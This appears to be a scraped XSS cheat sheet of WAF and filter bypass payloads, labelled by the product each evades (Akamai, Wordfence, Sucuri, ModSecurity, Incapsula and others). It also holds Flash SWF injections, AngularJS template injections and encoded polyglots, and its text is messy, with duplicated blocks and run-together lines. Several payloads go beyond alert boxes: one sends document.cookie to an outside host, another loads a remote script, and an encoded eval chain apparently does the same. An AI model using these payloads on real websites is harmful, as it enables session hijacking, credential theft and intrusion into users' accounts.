Professional Documents
Culture Documents
%3D<SVG/ONLOAD%3DALERT%281%29>%20%20<IFRAME%20SRC%3D"DATA%3ATEXT/HTML
%2C<SCRIPT>ALERT%281%29</SCRIPT>"%20CSP%3D"SCRIPT-SRC%20NONE%3B">
%20%20%27"></TITLE></SCRIPT><IMG%20SRC%3DX%20ONERROR%3DCONFIRM%281%29>
%20NOV%2028%2C%202019%20COMMENT%3A%20">%20%20ABC%3FLOCALE%3D
%20%20%20%20%27">%20NOV%2028%2C%202019%20COMMENT%3A%20<METER
%20ONMOUSEOVER%3D"ALERT%281%29"/<svg
onload=document.writeln(decodeURI(location.hash))>#<img src=1 onerror=alert(1)>
<svg/onload=eval(atob(URL.slice(-
148)))>#d2l0aChkb2N1bWVudClib2R5LmFwcGVuZENoaWxkKGNyZWF0ZUVsZW1lbnQoL3NjcmlwdC8
uc291cmNlKSkuc3JjPWF0b2IoL0x5OWljblYwWld4dloybGpMbU52YlM1aWNpOHkvLnNvdXJjZSk=
<javascript: onmouseover=location=tagName%2bURL>click me!#%0Aalert(1)
<javascript onclick=alert(tagName)>me!
<javascript: onclick=location=tagName%2BinnerHTML%2Blocation.hash>/*click me!#*/alert(1)<x
onclick=alert(1)>//X
<img src=x onerror=alert(1)>//
<img src=x autofocus onfocus=alert(1)>//
<svg onload=alert(1)>//
<x onclick=alert(1)>X
<img src=x onerror=alert(1)>
<img src=x autofocus onfocus=alert(1)>
<svg onload=alert(1)>
<script>alert(1)</script>
</script><script>alert(1)</script>
</noscript><script>alert(1)</script><noscript>
</title><svg onload=alert(1)><title>
%2522%253E%253CsVg oNlOaD%253Dalert%25281%2529%253e
%2522%253E%253CsVg oNlOaD%253D%2522alert%25281%2529
%2527%253E%253CsVg oNlOaD%253D%2527alert%25281%2529
%2522%253E%253CsVg oNlOaD%253Dal%255cu0065rt%25281%2529%253e
%253c%252fsCrIpT%253e%253csCrIpT%253ealert%25281%2529%253c%252fsCrIpT%253e
%2522%252dalert%25281%2529%252d%2522
%2522%252dal%255cu0065rt%25281%2529%252d%2522
%2527%252dalert%25281%2529%252d%2527
%2527%252dal%255cu0065rt%25281%2529%252d%2527
%255c%2522%253balert%25281%2529%253b%252f%252f
%255c%2527%253balert%25281%2529%253b%252f%252f
</sCrIpT><sCrIpT/*%0A<k>%28confirm%29(1)</sCrIpT>//
<iMg%0A%2fsRc%0A%3D%2f%20%0A/**/oNcLiCk%0A%3D%28confirm%29(1)>//
<bOdY%0A////////%0A%00/**/oNlOaD%0A%20%3D%28confirm%29(1)>//
<iframe srcdoc=%26lt;svg/o%26%23x6Eload%26equals;alert%26lpar;1)%26gt;>
<javascript: onclick=alert(tagName%2BinnerHTML%2Blocation.hash)>/*click me!#*/alert(1)
<sVg%0A////////%0A%00/%0A/**/oNlOaD%0A=(confirm)(1)>//
<output name="jAvAsCriPt://%26NewLine;\u0061ler%26%23116(1)" onclick="eval(name)">X</output>
<javascript: onmouseover=location=tagName%2bURL>click me!#%0Aalert(1)
<javascript: onclick=location=tagName%2BinnerHTML%2Blocation.hash>/*click me!#*/alert(1)
<svg onload=`<script`-alert(1)>
<svg onload=top[8680439..toString(30)](1)>
<svg onload=javas%26%2399ript:alert(1)>
<script src=https://www.google.com/complete/search?client=chrome%26jsonp=alert(1);></script>
<input onfocus="alert(1)" autofocus>
</title><svg onload=alert(1)><title>
</NOSCRIPT><svg onload=alert(1)><NOSCRIPT>
testtest"autofocus onfocus=alert(1)//
testtest'autofocus onfocus=alert(1)//
testtest"autofocus onfocus="alert(1)
testtest'autofocus onfocus='alert(1)
testtest"><svg onload="alert(1)
testtest'><svg onload='alert(1)
testtest"><svg onload=alert(1)>
testtest'><svg onload=alert(1)>
testtest%2522%252F%253E%253Csvg%20onload%3Dalert(1)%253E
</SCRIPT>%0A<SCRIPT>alert(1)</SCRIPT>
</SCRIPT>%0A<svg onload=alert(1)>
<output name="jAvAsCriPt://%26NewLine;\u0061ler%26%23116(1)" onclick="eval(name)">X</output>
<svg/onload=location=/javas/.source%2B/cript:/.source%2B/ale/.source%2B/rt/.source
%2Blocation.hash[1]%2B1%2Blocation.hash[2]>#()
<embed src='//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?
allowedDomain=\"})))}catch(e){alert(1337)}//' allowscriptaccess=always>
"><video </onloadeddata="1> (_=alert,_('sadd'))"" controls><source
src="https://www.w3schools.com/html/mov_bbb.mp4"></video>
<!-- --!> <script>alert`1`</script> -->
"-alert(1)//
'-alert(1)//
"-alert(1)-"
'-alert(1)-'
";alert(1);"
';alert(1);'
";-alert(1);"
';-alert(1);'
";-alert(1);-"
';-alert(1);-'
\";alert(1);//
\';alert(1);//
\\";alert(1);//
\\';alert(1);//
\";-alert(1);//
\';-alert(1);//
\\";-alert(1);//
\\';-alert(1);//
\";alert(1);//
\';alert(1);//
\";-alert(1);//
\';-alert(1);//
\";alert(1)//
\';alert(1)//
alert(1)
";alert(1); var foo="
';alert(1); var foo='
";}alert(1);function x(){//
';}alert(1);function x(){//
";}alert(1);-function x(){//
';}alert(1);-function x(){//
\"})))}catch(e){alert(1)}//
'}alert(1);{'
'}alert(1)%0A{'
\'}alert(1);{//
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(1)
)//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/
alert(1)%26sol;%26sol;
'';!--"<XSS>=&{()}
'';!--"=&{()}
'';!--"=&{()}
javascript:alert(1)
"'--!><Script /K/>confirm(1)</Script /K/>#
–!"><svg/onload=confirm(1)>
<"/*'/*</Title/</Script/--><svg/**/; OnlOad=(alert)(1)>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(1)
)//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(1)//>\
x3e(document.cookie) =
%26%2340;%26%23100;%26%23111;%26%2399;%26%23117;%26%23109;%26%23101;%26%23110;
%26%23116;%26%2346;%26%2399;%26%23111;%26%23111;%26%23107;%26%23105;%26%23101;
%26%2341;+--------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------
--------------+
WAF XSS Bypasses PACK & Tips or Trick XSS
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
1. Chrome XSS-Auditor
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
<svg><animate xlink:href=#x attributeName=href values=javascript:alert(1) /><a id=x><rect
width=100 height=100 /></a>
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
2. Chrome v60 beta XSS-Auditor
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
<script src="data:,alert(1)%250A-->
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
3. Chrome v44 XSS filter
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
<svg><script>/<@/>alert(1)</script>
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
4. Other Chrome XSS-Auditor
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
<script>alert(1)</script
<script>alert(1)%0d%0a-->%09</script
<x>%00%00%00%00%00%00%00<script>alert(1)</script>
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
5. Safari XSS Vector
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
<script>location.href;'javascript:alert%281%29'</script>
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
6. Kona WAF (Akamai)
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
\');confirm(1);//
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
7. Wordfence
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
<meter onmouseover="alert(1)"
'">><div><meter onmouseover="alert(1)"</div>"
>><marquee loop=1 width=0 onfinish=alert(1)>
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
8. Wordfence 7.4.2
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
<a href=%26%2301javascript:alert(1)>
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
9. Sucuri CloudProxy (POST only)
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
<a href=javascript%26colon;confirm(1)>
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
10. ModSecurity CRS 3.2.0 PL1
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
<a href="jav%0Dascript%26colon;alert(1)">
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
11. ModSecurity WAF Bypass
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
<img src=x onerror=prompt(document.domain) onerror=prompt(document.domain)
onerror=prompt(document.domain)>
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
12. Access Denied
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
</script><!--><svg/onload%3Da%3Dalert,b%3Ddocument.domain,[b].find(a)>
"><!--><Body%2FOnpointerenter=$.getScript("//brutelogic.com.br/2.js")>
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
13. 403 ERROR (CloudFront)
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
<svg %01onload=alert(1)>
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
14. Incapsula WAF
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
<iframe/onload='this["src"]="javas	cript:al"+"ert``"';>
<iframe/onload="var b = 'document.domain)'; var a = 'JaV' + 'ascRipt:al' + 'ert(' + b; this['src']=a">
<img/src=q onerror='new Function`al\ert\`1\``'>
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
15. jQuery < 3.0.0 XSS
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
$.get('http://sakurity.com/jqueryxss')
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
16. URL verification bypasses (works without 	 too)
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
javas	cript://www.google.com/%0Aalert(1)
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
17. Markdown XSS
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
[a](javascript:confirm(1))
[a](javascript://www.google.com%0Aprompt(1))
[a](javascript://%0d%0aconfirm(1))
[a](javascript://%0d%0aconfirm(1);com)
[a](javascript:window.onerror=confirm;throw%201)
[a]: (javascript:prompt(1))
[a]:(?javascript:alert(1)) //Add SOH Character
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
18. Flash SWF XSS
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
ZeroClipboard:
ZeroClipboard.swf?id=\"))}catch(e){confirm(/XSS./.source);}//&width=500&height=500&.swf
plUpload Player: plupload.flash.swf?%#target%g=alert&uid%g=XSS&
plUpload MoxiePlayer: Moxie.swf?target%g=confirm&uid%g=XSS (also works with Moxie.cdn.swf and
other variants)
FlashMediaElement: flashmediaelement.swf?jsinitfunctio%gn=alert1
videoJS: video-js.swf?readyFunction=confirm and video-js.swf?readyFunction=alert
%28document.domain%2b'%20XSS'%29
YUI "io.swf": io.swf?yid=\"));}catch(e){alert(document.domain);}//
YUI "uploader.swf": uploader.swf?allowedDomain=\%22}%29%29%29}catch%28e%29{alert
%28document.domain%29;}//<
Open Flash Chart: open-flash-chart.swf?get-data=(function(){alert(1)})()
AutoDemo: control.swf?onend=javascript:alert(1)//
Adobe FLV Progressive: /main.swf?baseurl=asfunction:getURL,javascript:alert(1)// and
/FLVPlayer_Progressive.swf?skinName=asfunction:getURL,javascript:alert(1)//
Banner.swf (generic): banner.swf?clickTAG=javascript:alert(document.domain);//
JWPlayer (legacy): player.swf?playerready=alert(document.domain) and /player.swf?
tracecall=alert(document.domain)
SWFUpload 2.2.0.1: swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!confirm(1);//
Uploadify (legacy): uploadify.swf?movieName=%22])}catch(e){if(!window.x){window.x=1;confirm(%27XSS
%27)}}//&.swf
FlowPlayer 3.2.7: flowplayer-3.2.7.swf?config={"clip":{"url":"http://edge.flowplayer.org/
bauhaus.mp4","linkUrl":"JavaScriPt:confirm(document.domain)"}}&.swf
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
19. XSS trigger open redirect
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
Param=java%09script:alert(1)
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
20. XSS filter bypass using stripped
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
<</div>script</div>>alert()<</div>/script</div>>
<</img>script</img>>alert()<</img>/script</img>>
<</a>script</a>>alert()<</a>/script</a>>
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
21. Advanced Javascript
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
test%27){prompt(1);}});var%20a%20=`;$(document).ready(function(){if(0){//
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
22. Email Validation
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
"><svg/onload=confirm(1)>"@x.y
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
23. XSS filter evasion
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
document.location=unescape("%19Jav%09asc%09ript:https ://foobar/%250Aconfirm%25281%2529")
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
24. Javascript Tips
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
No quotes = -(confirm)(document.domain)//
With single query = '-(confirm)(document.domain)//'
With Double query = "-(confirm)(document.domain)//"
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
25. String XSS Bypassed
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
/**/
/*
/
javascript%26colon;alert(1) (ex; %26colon; --> :)
+
%3D
%26lpar;1%26%2341; (ex; <svg onload=alert%26lpar;1%26%2341;>)
</<K> (ex; </script/<K>)
%0A
%0C
%0D
%00
%01
%09
<!--
<!-->
<!-- --!>
<!-- -->
<!--//--><![CDATA[//><!--
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
26. Alert, confirm, prompt, pop. (Bypassed)
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
a=alert,b=1,a(b) (ex; <svg onload=a=alert,b=1,a(b)>)
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
[1].find(alert) (ex; <svg onload=[1].find(alert)>)
[1].map(alert) (ex; <svg onload=[1].map(alert)>)
[1].every(alert) (ex; <svg onload=[1].every(alert)>)
[1].filter(alert) (ex; <svg onload=[1].filter(alert)>)
[1].findIndex(alert) (ex; <svg onload=[1].findIndex(alert)>)
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
alert(1) (ex; <svg onload=alert(1)>)
{alert(1)} (ex; <svg onload={alert(1)}>)
(alert(1)) (ex; <svg onload=(alert(1))>)
(alert)(1) (ex; <svg onload=[1].findIndex(alert)>)
{(alert)(1)} (ex; <svg onload={(alert)(1)}>)
alert(1)// (ex; <svg onload=alert(1)//>)
alert`1` (ex; <svg onload=alert`1`>)
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
al\u0065rt(1) (ex; <svg onload=alert`1`>)
top['al\145rt'](1) (ex; <svg onload=top['al\145rt'](1)>)
top[8680439..toString(30)](1) (ex; <svg onload=top[8680439..toString(30)](1)>)
al\u0065rt%26lpar;1%26rpar; (ex; <svg onload=al\u0065rt%26lpar;1%26rpar;>)
al\u%26%2348;065rt%26%2340;1%26%2341; (ex; <svg onload=al\u%26%2348;065rt
%26%2340;1%26%2341;>)
%26%2397;%26%23108;%26%23101;%26%23114;%26%23116;%26lpar;1%26rpar; (ex; <svg
onload=alert`1`>)
%26%2397;%26%23108;%26%23101;%26%23114;%26%23116;%26%2340;1%26%2341; (ex; <svg
onload=%26%2397;%26%23108;%26%23101;%26%23114;%26%23116;%26%2340;1%26%2341;>)
self['\x61\x6c\x65\x72\x74']%26lpar;'\x58\x53\x53'%29 (ex; <svg onload=self['\x61\x6c\x65\x72\x74']
%26lpar;'\x58\x53\x53'%29>)
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
27. Hidden Input,img,etc.
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
<"input type="hidden" value="XSS" onclick=alert(1)" + "accesskey="X"">
accesskey="x"
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
28. Cookie [Removed] Bypass XSS
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
(document.cookie) =
%26%2340;%26%23100;%26%23111;%26%2399;%26%23117;%26%23109;%26%23101;%26%23110;
%26%23116;%26%2346;%26%2399;%26%23111;%26%23111;%26%23107;%26%23105;%26%23101;
%26%2341;
(document.cookie) = %26lpar;
%26%23100;%26%23111;%26%2399;%26%23117;%26%23109;%26%23101;%26%23110;%26%23116
;%26%2346;%26%2399;%26%23111;%26%23111;%26%23107;%26%23105;%26%23101;%26rpar;
(document.cookie) = %26lpar;
%26%23100;%26%23111;%26%2399;%26%23117;%26%23109;%26%23101;%26%23110;%26%23116
;%26%2346;%26%2399;%26%23111;%26%23111;%26%23107;%26%23105;%26%23101;%29
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
29. XSS Polygots
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
<"/*'/*</Title/</Script/--><svg/**/; OnlOad=(alert)(1)>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(1)
)//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(1)//>\x3e
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
30. Dom XSS Attack
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
</script><svg onload=alert(1)>
"-alert(1)//
'-alert(1)//
"-alert(1)-"
'-alert(1)-'
";alert(1);"
';alert(1);'
";-alert(1);"
';-alert(1);'
";-alert(1);-"
';-alert(1);-'
\";alert(1);//
\';alert(1);//
\\";alert(1);//
\\';alert(1);//
\";-alert(1);//
\';-alert(1);//
\\";-alert(1);//
\\';-alert(1);//
\";alert(1);//
\';alert(1);//
\";-alert(1);//
\';-alert(1);//
\";alert(1)//
\';alert(1)//
alert(1)
";alert(1); var foo="
';alert(1); var foo='
";}alert(1);function x(){//
';}alert(1);function x(){//
";}alert(1);-function x(){//
';}alert(1);-function x(){//
\"})))}catch(e){alert(1)}//
'}alert(1);{'
'}alert(1)%0A{'
\'}alert(1);{//
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
31. XSS Testing
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
testtest't"t%5Ct%2Ft<"">t%0At%2522t
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
32. XSS Quick Test
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
'';!--"<XSS>=&{()}
'';!--"=&{()}
'';!--"=&{()}
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
https://www.rapidtables.com/web/html/html-codes.html{alert(1)}
(alert)(1)
a=alert,a(1)
a=alert,b=1,()
$=1,alert($)
a=alert,[1].find(a)
a=alert,b=4,[b].find(a)
[1].map(alert)
[1].find(alert)
[1].every(alert)
[1].filter(alert)
[1].findIndex(alert)
'-[1].on*(alert())-'
al\u0065rt(1)
top['al\145rt'](1)
top[8680439..toString(30)](1)
setInterval`alert\x28document.domain\x29`
%26emsp;prompt`${1}`
setTimeout`alert\x28document.domain\x29`
with(document)alert(domain)
a=setTimeout,b=alert,c=document.domain,a`b\x28c\x29`
[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162']
('\141\154\145\162\164\50\61\51')()
al\u0065rt%26lpar;1%26rpar;
al\u%26%2348;065rt%26%2340;1%26%2341;
%26%2397;%26%23108;%26%23101;%26%23114;%26%23116;%26lpar;1%26rpar;
%26%2397;%26%23108;%26%23101;%26%23114;%26%23116;%26%2340;1%26%2341;
self['\x61\x6c\x65\x72\x74']%26lpar;'\x58\x53\x53'%29
top.open`javas\cript:al\ert(1)`
foo=[123,666,999]
a=top[Object.keys(top).filter((v)=>{if(/^do/.test(v))return 1})];for(i in a)if(/ie$/.test(i))alert(a[i])accesskey="x"
How To Bypassed
---------------------
/**/
/**
%00
%01
%02
%03
%04
%05
%06
%07
%08
%09
%0A
%0B
%0C
%0D
---------------------
( = %28
) = %29
\ = %5C
/ = %2F
" = %22
= = %3D
: = %3A
---------------------
/**/confirm/**/
/**/(confirm)/**/
/**/%28confirm%29/**/
---------------------
(13337)
%2813337%29
%28%2F13337%2F%29
`13337`
`%2F13337%2F`
---------------------
onmouseover=""
onerror=""
autofocus onfocus=""
onload=""
---------------------'>"></script><svg onload=al\u0065rt(1)/><'"<"'
%26%2339;
>
%26%2334;
>
<
/
script
>
<svg onload
=
"al%26%2392;u0065rt%26%2340;1%26%2341;"
>testtest't"t%5Ct%2Ft<t>t%0At%2522t
testtest'>">/*\
testtest't"t%5Ct%2Ft<t>t%0At%2522t@x.y{{constructor.constructor('alert(1)')()}}
{{$eval.constructor('alert(1)')()}}
{{$on.constructor('alert(1)')()}}
{{toString().constructor.prototype.charAt=[].join; [1,2]|
orderBy:toString().constructor.fromCharCode(120,61,9 7,108,101,114,116,40,49,41)}}testtest"><svg
onload=alert(1)>@x.y%3Csvg onload%3Dalert%281%29
<>">"/>/">'>'/>/'>/>> <img/src=aaa.jpg onerror=prompt(document.cookie);> <video src=x
onerror=prompt(document.cookie);> <audio src=x onerror=prompt(document.cookie);>
"><iframe/src="javascript:alert(document.cookie)">
"><iframe/src="data:text/html;	base64
,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
"><form><button formaction=javascript:alert(document.cookie)>CLICKME</button></form>
"><object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTs8L3NjcmlwdD4=">
"><svg/onload=prompt(document.cookie);> "><select autofocus onfocus=alert(document.cookie)>
<textarea autofocus onfocus=alert(document.cookie)> "><keygen autofocus
onfocus=alert(document.cookie)> "><video><source onerror="javascript:alert(document.cookie)"> "><img
src=x onerror="javascript:window.onerror=alert;throw 1"> "><meta http-equiv="refresh"
content="0;url=//goo.gl/nlX0P"> "><math><a xlink:href="//goo.gl/nlX0P">click //
"><svg><script>alert(/1/)</script>
"><svg><script>varmyvar="text";alert(document.cookie)//";</script></svg> ~~~~~~~~~~~~~~
</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> "><svg
onload="prompt(/0/);"></svg> "><ScRipt>alert(0)</ScRipt>
"><scr<script>ipt>alert(document.cookie)</scr<script>ipt> "><a
href=javascript:alert(document.cookie)>Clickme</a> "><body/onhashchange=alert(document.cookie)><a
href=#>clickit</a> "><img src=x onerror=prompt(/xss+found+by+pik4chu/);> "><img src=x
onerror=prompt(document.cookie);> "><script>onmouseover=alert("xss found by pik4chu")</script>
"/></script><svg onload='-/"/-prompt(/baho kag bilat/)//' "><script>alert(String.fromCharCode(120, 115,
115, 32, 102, 111, 117, 110, 100, 32, 98, 121, 32, 112, 105, 107, 52, 99, 104, 117))</script>
"><script>alert("xss")</script> "><A HREF="http://www.google.com"><h1>xss</h1></A>
test'>';))alert('xss');function a () { function b () { var a=' <script>alert(document.coockie);</script>
<script>document.location="http://lgu-virac2010.gov.ph/cok/cok.php?c="+document.cookie</script>
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCo
de(88,83,83))//\";
alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))
</SCRIPT>=&{} javascript:prompt(0); javascript:alert(document.domain); javascript:alert("x"); '">'"><img
src=x onmouseover=alert(document.domain) ddd=> "onmouseover=alert(document.domain) "
http://www.thisislegal.com/tutorials/19 http://ha.ckers.org/xsscalc.html
http://sage.math.washington.edu/home/wstein/www/home/agc/lit/javascript/xss.html
http://www.w3schools.com/jsref/dom_obj_document.asp
http://www.w3schools.com/jsref/dom_obj_event.asp http://excess-xss.com/<>">"/>/">'>'/>/'>/>>
<img/src=aaa.jpg onerror=prompt(document.cookie);> <video src=x onerror=prompt(document.cookie);>
